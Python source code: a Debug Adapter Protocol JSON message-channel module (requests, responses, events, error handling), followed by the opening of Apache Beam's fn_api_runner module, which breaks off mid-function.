return fmt("{0!j}", self.json) if self.json is not None else repr(self)
def describe(self):
"""A brief description of the message that is enough to identify it.
Examples:
'#1 request "launch" from IDE'
'#2 response to #1 request "launch" from IDE'.
"""
raise NotImplementedError
@property
def payload(self):
"""Payload of the message - self.body or self.arguments, depending on the
message type.
"""
raise NotImplementedError
def __call__(self, *args, **kwargs):
"""Same as self.payload(...)."""
return self.payload(*args, **kwargs)
def __contains__(self, key):
"""Same as (key in self.payload)."""
return key in self.payload
def is_event(self, *event):
"""Returns True if this message is an Event of one of the specified types.
"""
if not isinstance(self, Event):
return False
return event == () or self.event in event
def is_request(self, *command):
"""Returns True if this message is a Request of one of the specified types.
"""
if not isinstance(self, Request):
return False
return command == () or self.command in command
def is_response(self, *command):
"""Returns True if this message is a Response to a request of one of the
specified types.
"""
if not isinstance(self, Response):
return False
return command == () or self.request.command in command
@staticmethod
def error(*args, **kwargs):
"""error([self], exc_type, format_string, *args, **kwargs)
Returns a new exception of the specified type from the point at which it is
invoked, with the specified formatted message as the reason.
This method can be used either as a static method, or as an instance method.
If invoked as an instance method, the resulting exception will have its cause
set to the Message object on which error() was called. Additionally, if the
message is a Request, a failure response is immediately sent.
"""
if isinstance(args[0], Message):
cause, exc_type, format_string = args[0:3]
args = args[3:]
else:
cause = None
exc_type, format_string = args[0:2]
args = args[2:]
assert issubclass(exc_type, MessageHandlingError)
silent = kwargs.pop("silent", False)
reason = fmt(format_string, *args, **kwargs)
exc = exc_type(reason, cause, silent) # will log it
if isinstance(cause, Request):
cause.respond(exc)
return exc
def isnt_valid(*args, **kwargs):
"""isnt_valid([self], format_string, *args, **kwargs)
Same as error(InvalidMessageError, ...).
"""
if isinstance(args[0], Message):
return args[0].error(InvalidMessageError, *args[1:], **kwargs)
else:
return Message.error(InvalidMessageError, *args, **kwargs)
def cant_handle(*args, **kwargs):
"""cant_handle([self], format_string, *args, **kwargs)
Same as error(MessageHandlingError, ...).
"""
if isinstance(args[0], Message):
return args[0].error(MessageHandlingError, *args[1:], **kwargs)
else:
return Message.error(MessageHandlingError, *args, **kwargs)
class Event(Message):
"""Represents an incoming event.
https://microsoft.github.io/debug-adapter-protocol/specification#event
It is guaranteed that body is a MessageDict associated with this Event, and so
are all the nested dicts in it. If "body" was missing or null in JSON, body is
an empty dict.
To handle the event, JsonMessageChannel tries to find a handler for this event in
JsonMessageChannel.handlers. Given event="X", if handlers.X_event exists, then it
is the specific handler for this event. Otherwise, handlers.event must exist, and
it is the generic handler for this event. A missing handler is a fatal error.
No further incoming messages are processed until the handler returns, except for
responses to requests that have wait_for_response() invoked on them.
To report failure to handle the event, the handler must raise an instance of
MessageHandlingError that applies_to() the Event object it was handling. Any such
failure is logged, after which the message loop moves on to the next message.
Helper methods Message.isnt_valid() and Message.cant_handle() can be used to raise
the appropriate exception type that applies_to() the Event object.
"""
def __init__(self, channel, seq, event, body, json=None):
super(Event, self).__init__(channel, seq, json)
self.event = event
if isinstance(body, MessageDict) and hasattr(body, "associate_with"):
body.associate_with(self)
self.body = body
def describe(self):
return fmt("#{0} event {1!j} from {2}", self.seq, self.event, self.channel)
@property
def payload(self):
return self.body
@staticmethod
def _parse(channel, message_dict):
seq = message_dict("seq", int)
event = message_dict("event", unicode)
body = message_dict("body", _payload)
message = Event(channel, seq, event, body, json=message_dict)
channel._enqueue_handlers(message, message._handle)
def _handle(self):
channel = self.channel
handler = channel._get_handler_for("event", self.event)
try:
try:
result = handler(self)
assert result is None, fmt(
"Handler {0} tried to respond to {1}.",
compat.srcnameof(handler),
self.describe(),
)
except MessageHandlingError as exc:
if not exc.applies_to(self):
raise
log.error(
"Handler {0}\ncouldn't handle {1}:\n{2}",
compat.srcnameof(handler),
self.describe(),
str(exc),
)
except Exception:
raise log.exception(
"Handler {0}\ncouldn't handle {1}:",
compat.srcnameof(handler),
self.describe(),
)
NO_RESPONSE = object()
"""Can be returned from a request handler in lieu of the response body, to indicate
that no response is to be sent.
Request.respond() must be invoked explicitly at some later point to provide a response.
"""
class Request(Message):
"""Represents an incoming or an outgoing request.
Incoming requests are represented directly by instances of this class.
Outgoing requests are represented by instances of OutgoingRequest, which provides
additional functionality to handle responses.
For incoming requests, it is guaranteed that arguments is a MessageDict associated
with this Request, and so are all the nested dicts in it. If "arguments" was missing
or null in JSON, arguments is an empty dict.
To handle the request, JsonMessageChannel tries to find a handler for this request
in JsonMessageChannel.handlers. Given command="X", if handlers.X_request exists,
then it is the specific handler for this request. Otherwise, handlers.request must
exist, and it is the generic handler for this request. A missing handler is a fatal
error.
The handler is then invoked with the Request object as its sole argument.
If the handler itself invokes respond() on the Request at any point, then it must
not return any value.
Otherwise, if the handler returns NO_RESPONSE, no response to the request is sent.
It must be sent manually at some later point via respond().
Otherwise, a response to the request is sent with the returned value as the body.
To fail the request, the handler can return an instance of MessageHandlingError,
or respond() with one, or raise one such that it applies_to() the Request object
being handled.
Helper methods Message.isnt_valid() and Message.cant_handle() can be used to raise
the appropriate exception type that applies_to() the Request object.
"""
def __init__(self, channel, seq, command, arguments, json=None):
super(Request, self).__init__(channel, seq, json)
self.command = command
if isinstance(arguments, MessageDict) and hasattr(arguments, "associate_with"):
arguments.associate_with(self)
self.arguments = arguments
self.response = None
"""Response to this request.
For incoming requests, it is set as soon as the request handler returns.
For outgoing requests, it is set as soon as the response is received, and
before self._handle_response is invoked.
"""
def describe(self):
return fmt("#{0} request {1!j} from {2}", self.seq, self.command, self.channel)
@property
def payload(self):
return self.arguments
def respond(self, body):
assert self.response is None
d = {"type": "response", "request_seq": self.seq, "command": self.command}
if isinstance(body, Exception):
d["success"] = False
err_text = str(body)
try:
err_text = compat.force_unicode(err_text, "utf-8")
except Exception:
# On Python 2, the error message might not be Unicode, and we don't
# really know what encoding it is. So if treating it as UTF-8 failed,
# use repr() as a fallback - it should escape all non-ASCII chars in
# the string.
err_text = compat.force_unicode(repr(body), "ascii", errors="replace")
d["message"] = err_text
else:
d["success"] = True
if body is not None and body != {}:
d["body"] = body
with self.channel._send_message(d) as seq:
pass
self.response = Response(self.channel, seq, self, body)
@staticmethod
def _parse(channel, message_dict):
seq = message_dict("seq", int)
command = message_dict("command", unicode)
arguments = message_dict("arguments", _payload)
message = Request(channel, seq, command, arguments, json=message_dict)
channel._enqueue_handlers(message, message._handle)
def _handle(self):
channel = self.channel
handler = channel._get_handler_for("request", self.command)
try:
try:
result = handler(self)
except MessageHandlingError as exc:
if not exc.applies_to(self):
raise
result = exc
log.error(
"Handler {0}\ncouldn't handle {1}:\n{2}",
compat.srcnameof(handler),
self.describe(),
str(exc),
)
if result is NO_RESPONSE:
assert self.response is None, fmt(
"Handler {0} for {1} must not return NO_RESPONSE if it has already "
"invoked request.respond().",
compat.srcnameof(handler),
self.describe(),
)
elif self.response is not None:
assert result is None or result is self.response.body, fmt(
"Handler {0} for {1} must not return a response body if it has "
"already invoked request.respond().",
compat.srcnameof(handler),
self.describe(),
)
else:
assert result is not None, fmt(
"Handler {0} for {1} must either call request.respond() before it "
"returns, or return the response body, or return NO_RESPONSE.",
compat.srcnameof(handler),
self.describe(),
)
try:
self.respond(result)
except NoMoreMessages:
log.warning(
"Channel was closed before the response from handler {0} to {1} could be sent",
compat.srcnameof(handler),
self.describe(),
)
except Exception:
raise log.exception(
"Handler {0}\ncouldn't handle {1}:",
compat.srcnameof(handler),
self.describe(),
)
class OutgoingRequest(Request):
"""Represents an outgoing request, for which it is possible to wait for a
response to be received, and register a response handler.
"""
_parse = _handle = None
def __init__(self, channel, seq, command, arguments):
super(OutgoingRequest, self).__init__(channel, seq, command, arguments)
self._response_handlers = []
def describe(self):
return fmt("#{0} request {1!j} to {2}", self.seq, self.command, self.channel)
def wait_for_response(self, raise_if_failed=True):
"""Waits until a response is received for this request, records the Response
object for it in self.response, and returns response.body.
If no response was received from the other party before the channel closed,
self.response is a synthesized Response with body=NoMoreMessages().
If raise_if_failed=True and response.success is False, raises response.body
instead of returning.
"""
with self.channel:
while self.response is None:
self.channel._handlers_enqueued.wait()
if raise_if_failed and not self.response.success:
raise self.response.body
return self.response.body
def on_response(self, response_handler):
"""Registers a handler to invoke when a response is received for this request.
The handler is invoked with Response as its sole argument.
If response has already been received, invokes the handler immediately.
It is guaranteed that self.response is set before the handler is invoked.
If no response was received from the other party before the channel closed,
self.response is a dummy Response with body=NoMoreMessages().
The handler is always invoked asynchronously on an unspecified background
thread - thus, the caller of on_response() can never be blocked or deadlocked
by the handler.
No further incoming messages are processed until the handler returns, except for
responses to requests that have wait_for_response() invoked on them.
"""
with self.channel:
self._response_handlers.append(response_handler)
self._enqueue_response_handlers()
def _enqueue_response_handlers(self):
response = self.response
if response is None:
# Response._parse() will submit the handlers when response is received.
return
def run_handlers():
for handler in handlers:
try:
try:
handler(response)
except MessageHandlingError as exc:
if not exc.applies_to(response):
raise
log.error(
"Handler {0}\ncouldn't handle {1}:\n{2}",
compat.srcnameof(handler),
response.describe(),
str(exc),
)
except Exception:
raise log.exception(
"Handler {0}\ncouldn't handle {1}:",
compat.srcnameof(handler),
response.describe(),
)
handlers = self._response_handlers[:]
self.channel._enqueue_handlers(response, run_handlers)
del self._response_handlers[:]
class Response(Message):
"""Represents an incoming or an outgoing response to a Request.
https://microsoft.github.io/debug-adapter-protocol/specification#response
error_message corresponds to "message" in JSON, and is renamed for clarity.
If success is False, body is None. Otherwise, it is a MessageDict associated
with this Response, and so are all the nested dicts in it. If "body" was missing
or null in JSON, body is an empty dict.
If this is a response to an outgoing request, it will be handled by the handler
registered via self.request.on_response(), if any.
Regardless of whether there is such a handler, OutgoingRequest.wait_for_response()
can also be used to retrieve and handle the response. If there is a handler, it is
executed before wait_for_response() returns.
No further incoming messages are processed until the handler returns, except for
responses to requests that have wait_for_response() invoked on them.
To report failure to handle the event, the handler must raise an instance of
MessageHandlingError that applies_to() the Response object it was handling. Any
such failure is logged, after which the message loop moves on to the next message.
Helper methods Message.isnt_valid() and Message.cant_handle() can be used to raise
the appropriate exception type that applies_to() the Response object.
"""
def __init__(self, channel, seq, request, body, json=None):
super(Response, self).__init__(channel, seq, json)
self.request = request
"""The request to which this is the response."""
if isinstance(body, MessageDict) and hasattr(body, "associate_with"):
body.associate_with(self)
self.body = body
"""Body of the response if the request was successful, or an instance
of some class derived from Exception it it was not.
If a response was received from the other side, but request failed, it is an
instance of MessageHandlingError containing the received error message. If the
error message starts with InvalidMessageError.PREFIX, then it's an instance of
the InvalidMessageError specifically, and that prefix is stripped.
If no response was received from the other party before the channel closed,
it is an instance of NoMoreMessages.
"""
def describe(self):
return fmt("#{0} response to {1}", self.seq, self.request.describe())
@property
def payload(self):
return self.body
@property
def success(self):
"""Whether the request succeeded or not.
"""
return not isinstance(self.body, Exception)
@property
def result(self):
"""Result of the request. Returns the value of response.body, unless it
is an exception, in which case it is raised instead.
"""
if self.success:
return self.body
else:
raise self.body
@staticmethod
def _parse(channel, message_dict, body=None):
seq = message_dict("seq", int) if (body is None) else None
request_seq = message_dict("request_seq", int)
command = message_dict("command", unicode)
success = message_dict("success", bool)
if body is None:
if success:
body = message_dict("body", _payload)
else:
error_message = message_dict("message", unicode)
exc_type = MessageHandlingError
if error_message.startswith(InvalidMessageError.PREFIX):
error_message = error_message[len(InvalidMessageError.PREFIX) :]
exc_type = InvalidMessageError
body = exc_type(error_message, silent=True)
try:
with channel:
request = channel._sent_requests.pop(request_seq)
known_request = True
except KeyError:
# Synthetic Request that only has seq and command as specified in response
# JSON, for error reporting purposes.
request = OutgoingRequest(channel, request_seq, command, "<unknown>")
known_request = False
if not success:
body.cause = request
response = Response(channel, seq, request, body, json=message_dict)
with channel:
request.response = response
request._enqueue_response_handlers()
if known_request:
return response
else:
raise response.isnt_valid(
"request_seq={0} does not match any known request", request_seq
)
class Disconnect(Message):
"""A dummy message used to represent disconnect. It's always the last message
received from any channel.
"""
def __init__(self, channel):
super(Disconnect, self).__init__(channel, None)
def describe(self):
return fmt("disconnect from {0}", self.channel)
class MessageHandlingError(Exception):
"""Indicates that a message couldn't be handled for some reason.
If the reason is a contract violation - i.e. the message that was handled did not
conform to the protocol specification - InvalidMessageError, which is a subclass,
should be used instead.
If any message handler raises an exception not derived from this class, it will
escape the message loop unhandled, and terminate the process.
If any message handler raises this exception, but applies_to(message) is False, it
is treated as if it was a generic exception, as desribed above. Thus, if a request
handler issues another request of its own, and that one fails, the failure is not
silently propagated. However, a request that is delegated via Request.delegate()
will also propagate failures back automatically. For manual propagation, catch the
exception, and call exc.propagate().
If any event handler raises this exception, and applies_to(event) is True, the
exception is silently swallowed by the message loop.
If any request handler raises this exception, and applies_to(request) is True, the
exception is silently swallowed by the message loop, and a failure response is sent
with "message" set to str(reason).
Note that, while errors are not logged when they're swallowed by the message loop,
by that time they have already been logged by their __init__ (when instantiated).
"""
def __init__(self, reason, cause=None, silent=False):
"""Creates a new instance of this class, and immediately logs the exception.
Message handling errors are logged immediately unless silent=True, so that the
precise context in which they occured can be determined from the surrounding
log entries.
"""
self.reason = reason
"""Why it couldn't be handled. This can be any object, but usually it's either
str or Exception.
"""
assert cause is None or isinstance(cause, Message)
self.cause = cause
"""The Message object for the message that couldn't be handled. For responses
to unknown requests, this is a synthetic Request.
"""
if not silent:
try:
raise self
except MessageHandlingError:
log.exception()
def __hash__(self):
return hash((self.reason, id(self.cause)))
def __eq__(self, other):
if not isinstance(other, MessageHandlingError):
return NotImplemented
if type(self) is not type(other):
return NotImplemented
if self.reason != other.reason:
return False
if self.cause is not None and other.cause is not None:
if self.cause.seq != other.cause.seq:
return False
return True
def __ne__(self, other):
return not self == other
def __str__(self):
return str(self.reason)
def __repr__(self):
s = type(self).__name__
if self.cause is None:
s += fmt("(reason={0!r})", self.reason)
else:
s += fmt(
"(channel={0!r}, cause={1!r}, reason={2!r})",
self.cause.channel.name,
self.cause.seq,
self.reason,
)
return s
def applies_to(self, message):
"""Whether this MessageHandlingError can be treated as a reason why the
handling of message failed.
If self.cause is None, this is always true.
If self.cause is not None, this is only true if cause is message.
"""
return self.cause is None or self.cause is message
def propagate(self, new_cause):
"""Propagates this error, raising a new instance of the same class with the
same reason, but a different cause.
"""
raise type(self)(self.reason, new_cause, silent=True)
class InvalidMessageError(MessageHandlingError):
"""Indicates that an incoming message did not follow the protocol specification -
for example, it was missing properties that are required, or the message itself
is not allowed in the current state.
Raised by MessageDict in lieu of KeyError for missing keys.
"""
PREFIX = "Invalid message: "
"""Automatically prepended to the "message" property in JSON responses, when the
handler raises InvalidMessageError.
If a failed response has "message" property that starts with this prefix, it is
reported as InvalidMessageError rather than MessageHandlingError.
"""
def __str__(self):
return InvalidMessageError.PREFIX + str(self.reason)
class JsonMessageChannel(object):
"""Implements a JSON message channel on top of a raw JSON message stream, with
support for DAP requests, responses, and events.
The channel can be locked for exclusive use via the with-statement::
with channel:
channel.send_request(...)
# No interleaving messages can be sent here from other threads.
channel.send_event(...)
"""
def __init__(self, stream, handlers=None, name=None):
self.stream = stream
self.handlers = handlers
self.name = name if name is not None else stream.name
self._lock = threading.RLock()
self._closed = False
self._seq_iter = itertools.count(1)
self._sent_requests = {} # {seq: Request}
self._handler_queue = [] # [(what, handler)]
self._handlers_enqueued = threading.Condition(self._lock)
self._handler_thread = None
self._parser_thread = None
def __str__(self):
return self.name
def __repr__(self):
return fmt("{0}({1!r})", type(self).__name__, self.name)
def __enter__(self):
self._lock.acquire()
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self._lock.release()
def close(self):
"""Closes the underlying stream.
This does not immediately terminate any handlers that are already executing,
but they will be unable to respond. No new request or event handlers will
execute after this method is called, even for messages that have already been
received. However, response handlers will continue to executed for any request
that is still pending, as will any handlers registered via on_response().
"""
with self:
if not self._closed:
self._closed = True
self.stream.close()
def start(self):
"""Starts a message loop which parses incoming messages and invokes handlers
for them on a background thread, until the channel is closed.
Incoming messages, including responses to requests, will not be processed at
all until this is invoked.
"""
self._parser_thread = threading.Thread(
target=self._parse_incoming_messages, name=fmt("{0} message parser", self)
)
self._parser_thread.pydev_do_not_trace = True
self._parser_thread.is_pydev_daemon_thread = True
self._parser_thread.daemon = True
self._parser_thread.start()
def wait(self):
"""Waits for the message loop to terminate, and for all enqueued Response
message handlers to finish executing.
"""
parser_thread = self._parser_thread
if parser_thread is not None:
parser_thread.join()
handler_thread = self._handler_thread
if handler_thread is not None:
handler_thread.join()
# Order of keys for _prettify() - follows the order of properties in
# https://microsoft.github.io/debug-adapter-protocol/specification
_prettify_order = (
"seq",
"type",
"request_seq",
"success",
"command",
"event",
"message",
"arguments",
"body",
"error",
)
def _prettify(self, message_dict):
"""Reorders items in a MessageDict such that it is more readable.
"""
for key in self._prettify_order:
if key not in message_dict:
continue
value = message_dict[key]
del message_dict[key]
message_dict[key] = value
@contextlib.contextmanager
def _send_message(self, message):
"""Sends a new message to the other party.
Generates a new sequence number for the message, and provides it to the
caller before the message is sent, using the context manager protocol::
with send_message(...) as seq:
# The message hasn't been sent yet.
...
# Now the message has been sent.
Safe to call concurrently for the same channel from different threads.
"""
assert "seq" not in message
with self:
seq = next(self._seq_iter)
message = MessageDict(None, message)
message["seq"] = seq
self._prettify(message)
with self:
yield seq
self.stream.write_json(message)
def send_request(self, command, arguments=None, on_before_send=None):
"""Sends a new request, and returns the OutgoingRequest object for it.
If arguments is None or {}, "arguments" will be omitted in JSON.
If on_before_send is not None, invokes on_before_send() with the request
object as the sole argument, before the request actually gets sent.
Does not wait for response - use OutgoingRequest.wait_for_response().
Safe to call concurrently for the same channel from different threads.
"""
d = {"type": "request", "command": command}
if arguments is not None and arguments != {}:
d["arguments"] = arguments
with self._send_message(d) as seq:
request = OutgoingRequest(self, seq, command, arguments)
if on_before_send is not None:
on_before_send(request)
self._sent_requests[seq] = request
return request
def send_event(self, event, body=None):
"""Sends a new event.
If body is None or {}, "body" will be omitted in JSON.
Safe to call concurrently for the same channel from different threads.
"""
d = {"type": "event", "event": event}
if body is not None and body != {}:
d["body"] = body
with self._send_message(d):
pass
def request(self, *args, **kwargs):
"""Same as send_request(...).wait_for_response()
"""
return self.send_request(*args, **kwargs).wait_for_response()
def propagate(self, message):
"""Sends a new message with the same type and payload.
If it was a request, returns the new OutgoingRequest object for it.
"""
assert message.is_request() or message.is_event()
if message.is_request():
return self.send_request(message.command, message.arguments)
else:
self.send_event(message.event, message.body)
def delegate(self, message):
"""Like propagate(message).wait_for_response(), but will also propagate
any resulting MessageHandlingError back.
"""
try:
result = self.propagate(message)
if result.is_request():
result = result.wait_for_response()
return result
except MessageHandlingError as exc:
exc.propagate(message)
def _parse_incoming_messages(self):
log.debug("Starting message loop for channel {0}", self)
try:
while True:
self._parse_incoming_message()
except NoMoreMessages as exc:
log.debug("Exiting message loop for channel {0}: {1}", self, exc)
with self:
# Generate dummy responses for all outstanding requests.
err_message = compat.force_unicode(str(exc), "utf-8", errors="replace")
# Response._parse() will remove items from _sent_requests, so
# make a snapshot before iterating.
sent_requests = list(self._sent_requests.values())
for request in sent_requests:
response_json = MessageDict(
None,
{
"seq": -1,
"request_seq": request.seq,
"command": request.command,
"success": False,
"message": err_message,
},
)
Response._parse(self, response_json, body=exc)
assert not len(self._sent_requests)
self._enqueue_handlers(Disconnect(self), self._handle_disconnect)
self.close()
_message_parsers = {
"event": Event._parse,
"request": Request._parse,
"response": Response._parse,
}
def _parse_incoming_message(self):
"""Reads incoming messages, parses them, and puts handlers into the queue
for _run_handlers() to invoke, until the channel is closed.
"""
# Set up a dedicated decoder for this message, to create MessageDict instances
# for all JSON objects, and track them so that they can be later wired up to
# the Message they belong to, once it is instantiated.
def object_hook(d):
d = MessageDict(None, d)
if "seq" in d:
self._prettify(d)
d.associate_with = associate_with
message_dicts.append(d)
return d
# A hack to work around circular dependency between messages, and instances of
# MessageDict in their payload. We need to set message for all of them, but it
# cannot be done until the actual Message is created - which happens after the
# dicts are created during deserialization.
#
# So, upon deserialization, every dict in the message payload gets a method
# that can be called to set MessageDict.message for *all* dicts belonging to
# that message. This method can then be invoked on the top-level dict by the
# parser, after it has parsed enough of the dict to create the appropriate
# instance of Event, Request, or Response for this message.
def associate_with(message):
for d in message_dicts:
d.message = message
del d.associate_with
message_dicts = []
decoder = self.stream.json_decoder_factory(object_hook=object_hook)
message_dict = self.stream.read_json(decoder)
assert isinstance(message_dict, MessageDict) # make sure stream used decoder
msg_type = message_dict("type", json.enum("event", "request", "response"))
parser = self._message_parsers[msg_type]
try:
parser(self, message_dict)
except InvalidMessageError as exc:
log.error(
"Failed to parse message in channel {0}: {1} in:\n{2!j}",
self,
str(exc),
message_dict,
)
except Exception as exc:
if isinstance(exc, NoMoreMessages) and exc.stream is self.stream:
raise
log.exception(
"Fatal error in channel {0} while parsing:\n{1!j}", self, message_dict
)
os._exit(1)
def _enqueue_handlers(self, what, *handlers):
"""Enqueues handlers for _run_handlers() to run.
`what` is the Message being handled, and is used for logging purposes.
If the background thread with _run_handlers() isn't running yet, starts it.
"""
with self:
self._handler_queue.extend((what, handler) for handler in handlers)
self._handlers_enqueued.notify_all()
# If there is anything to handle, but there's no handler thread yet,
# spin it up. This will normally happen only once, on the first call
# to _enqueue_handlers(), and that thread will run all the handlers
# for parsed messages. However, this can also happen is somebody calls
# Request.on_response() - possibly concurrently from multiple threads -
# after the channel has already been closed, and the initial handler
# thread has exited. In this case, we spin up a new thread just to run
# the enqueued response handlers, and it will exit as soon as it's out
# of handlers to run.
if len(self._handler_queue) and self._handler_thread is None:
self._handler_thread = threading.Thread(
target=self._run_handlers, name=fmt("{0} message handler", self)
)
self._handler_thread.pydev_do_not_trace = True
self._handler_thread.is_pydev_daemon_thread = True
self._handler_thread.start()
def _run_handlers(self):
"""Runs enqueued handlers until the channel is closed, or until the handler
queue is empty once the channel is closed.
"""
while True:
with self:
closed = self._closed
if closed:
# Wait for the parser thread to wrap up and enqueue any remaining
# handlers, if it is still running.
self._parser_thread.join()
# From this point on, _enqueue_handlers() can only get called
# from Request.on_response().
with self:
if not closed and not len(self._handler_queue):
# Wait for something to process.
self._handlers_enqueued.wait()
# Make a snapshot before releasing the lock.
handlers = self._handler_queue[:]
del self._handler_queue[:]
if closed and not len(handlers):
# Nothing to process, channel is closed, and parser thread is
# not running anymore - time to quit! If Request.on_response()
# needs to call _enqueue_handlers() later, it will spin up
# a new handler thread.
self._handler_thread = None
return
for what, handler in handlers:
# If the channel is closed, we don't want to process any more events
# or requests - only responses and the final disconnect handler. This
# is to guarantee that if a handler calls close() on its own channel,
# the corresponding request or event is the last thing to be processed.
if closed and handler in (Event._handle, Request._handle):
continue
with log.prefixed("[handling {0}]\n", what.describe()):
try:
handler()
except Exception:
# It's already logged by the handler, so just fail fast.
self.close()
os._exit(1)
def _get_handler_for(self, type, name):
"""Returns the handler for a message of a given type.
"""
for handler_name in (name + "_" + type, type):
try:
return getattr(self.handlers, handler_name)
except AttributeError:
continue
raise AttributeError(
fmt(
"Channel {0} has no handler for {1} {2!r}",
compat.srcnameof(self.handlers),
type,
name,
)
)
def _handle_disconnect(self):
handler = getattr(self.handlers, "disconnect", lambda: None)
try:
handler()
except Exception:
raise log.exception(
"Handler {0}\ncouldn't handle disconnect from {1}:",
compat.srcnameof(handler),
self,
)
class MessageHandlers(object):
"""A simple delegating message handlers object for use with JsonMessageChannel.
For every argument provided, the object gets an attribute with the corresponding
name and value.
"""
def __init__(self, **kwargs):
for name, func in kwargs.items():
setattr(self, name, func)
|
fn_api_runner.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A PipelineRunner using the SDK harness.
"""
from __future__ import absolute_import
from __future__ import print_function
import collections
import contextlib
import copy
import itertools
import logging
import os
import queue
import subprocess
import sys
import threading
import time
import uuid
from builtins import object
from concurrent import futures
import grpc
import apache_beam as beam # pylint: disable=ungrouped-imports
from apache_beam import coders
from apache_beam.coders.coder_impl import create_InputStream
from apache_beam.coders.coder_impl import create_OutputStream
from apache_beam.metrics import metric
from apache_beam.metrics import monitoring_infos
from apache_beam.metrics.execution import MetricResult
from apache_beam.options import pipeline_options
from apache_beam.options.value_provider import RuntimeValueProvider
from apache_beam.portability import common_urns
from apache_beam.portability import python_urns
from apache_beam.portability.api import beam_artifact_api_pb2
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import beam_provision_api_pb2
from apache_beam.portability.api import beam_provision_api_pb2_grpc
from apache_beam.portability.api import beam_runner_api_pb2
from apache_beam.portability.api import endpoints_pb2
from apache_beam.runners import pipeline_context
from apache_beam.runners import runner
from apache_beam.runners.portability import artifact_service
from apache_beam.runners.portability import fn_api_runner_transforms
from apache_beam.runners.portability import portable_metrics
from apache_beam.runners.portability.fn_api_runner_transforms import create_buffer_id
from apache_beam.runners.portability.fn_api_runner_transforms import only_element
from apache_beam.runners.portability.fn_api_runner_transforms import split_buffer_id
from apache_beam.runners.portability.fn_api_runner_transforms import unique_name
from apache_beam.runners.worker import bundle_processor
from apache_beam.runners.worker import data_plane
from apache_beam.runners.worker import sdk_worker
from apache_beam.runners.worker.channel_factory import GRPCChannelFactory
from apache_beam.runners.worker.sdk_worker import _Future
from apache_beam.runners.worker.statecache import StateCache
from apache_beam.transforms import environments
from apache_beam.transforms import trigger
from apache_beam.transforms.window import GlobalWindow
from apache_beam.transforms.window import GlobalWindows
from apache_beam.utils import profiler
from apache_beam.utils import proto_utils
from apache_beam.utils import windowed_value
# This module is experimental. No backwards-compatibility guarantees.
ENCODED_IMPULSE_VALUE = beam.coders.WindowedValueCoder(
beam.coders.BytesCoder(),
beam.coders.coders.GlobalWindowCoder()).get_impl().encode_nested(
beam.transforms.window.GlobalWindows.windowed_value(b''))
# State caching is enabled in the fn_api_runner for testing, except for one
# test which runs without state caching (FnApiRunnerTestWithDisabledCaching).
# The cache is disabled in production for other runners.
STATE_CACHE_SIZE = 100
class ControlConnection(object):
_uid_counter = 0
_lock = threading.Lock()
def __init__(self):
self._push_queue = queue.Queue()
self._input = None
self._futures_by_id = dict()
self._read_thread = threading.Thread(
name='beam_control_read', target=self._read)
self._state = BeamFnControlServicer.UNSTARTED_STATE
def _read(self):
for data in self._input:
self._futures_by_id.pop(data.instruction_id).set(data)
def push(self, req):
if req == BeamFnControlServicer._DONE_MARKER:
self._push_queue.put(req)
return None
if not req.instruction_id:
with ControlConnection._lock:
ControlConnection._uid_counter += 1
req.instruction_id = 'control_%s' % ControlConnection._uid_counter
future = ControlFuture(req.instruction_id)
self._futures_by_id[req.instruction_id] = future
self._push_queue.put(req)
return future
def get_req(self):
return self._push_queue.get()
def set_input(self, input):
with ControlConnection._lock:
if self._input:
raise RuntimeError('input is already set.')
self._input = input
self._read_thread.start()
self._state = BeamFnControlServicer.STARTED_STATE
def close(self):
with ControlConnection._lock:
if self._state == BeamFnControlServicer.STARTED_STATE:
self.push(BeamFnControlServicer._DONE_MARKER)
self._read_thread.join()
self._state = BeamFnControlServicer.DONE_STATE
class BeamFnControlServicer(beam_fn_api_pb2_grpc.BeamFnControlServicer):
"""Implementation of BeamFnControlServicer for clients."""
UNSTARTED_STATE = 'unstarted'
STARTED_STATE = 'started'
DONE_STATE = 'done'
_DONE_MARKER = object()
def __init__(self):
self._lock = threading.Lock()
self._uid_counter = 0
self._state = self.UNSTARTED_STATE
# following self._req_* variables are used for debugging purpose, data is
# added only when self._log_req is True.
self._req_sent = collections.defaultdict(int)
self._req_worker_mapping = {}
self._log_req = logging.getLogger().getEffectiveLevel() <= logging.DEBUG
self._connections_by_worker_id = collections.defaultdict(ControlConnection)
def get_conn_by_worker_id(self, worker_id):
with self._lock:
return self._connections_by_worker_id[worker_id]
def Control(self, iterator, context):
with self._lock:
if self._state == self.DONE_STATE:
return
else:
self._state = self.STARTED_STATE
worker_id = dict(context.invocation_metadata()).get('worker_id')
if not worker_id:
raise RuntimeError('All workers communicate through gRPC should have '
'worker_id. Received None.')
control_conn = self.get_conn_by_worker_id(worker_id)
control_conn.set_input(iterator)
while True:
to_push = control_conn.get_req()
if to_push is self._DONE_MARKER:
return
yield to_push
if self._log_req:
self._req_sent[to_push.instruction_id] += 1
def done(self):
self._state = self.DONE_STATE
logging.debug('Runner: Requests sent by runner: %s',
[(str(req), cnt) for req, cnt in self._req_sent.items()])
logging.debug('Runner: Requests multiplexing info: %s',
[(str(req), worker) for req, worker
in self._req_worker_mapping.items()])
class _ListBuffer(list):
"""Used to support parititioning of a list."""
def partition(self, n):
return [self[k::n] for k in range(n)]
class _GroupingBuffer(object):
"""Used to accumulate groupded (shuffled) results."""
def __init__(self, pre_grouped_coder, post_grouped_coder, windowing):
self._key_coder = pre_grouped_coder.key_coder()
self._pre_grouped_coder = pre_grouped_coder
self._post_grouped_coder = post_grouped_coder
self._table = collections.defaultdict(list)
self._windowing = windowing
self._grouped_output = None
def append(self, elements_data):
if self._grouped_output:
raise RuntimeError('Grouping table append after read.')
input_stream = create_InputStream(elements_data)
coder_impl = self._pre_grouped_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
# TODO(robertwb): We could optimize this even more by using a
# window-dropping coder for the data plane.
is_trivial_windowing = self._windowing.is_default()
while input_stream.size() > 0:
windowed_key_value = coder_impl.decode_from_stream(input_stream, True)
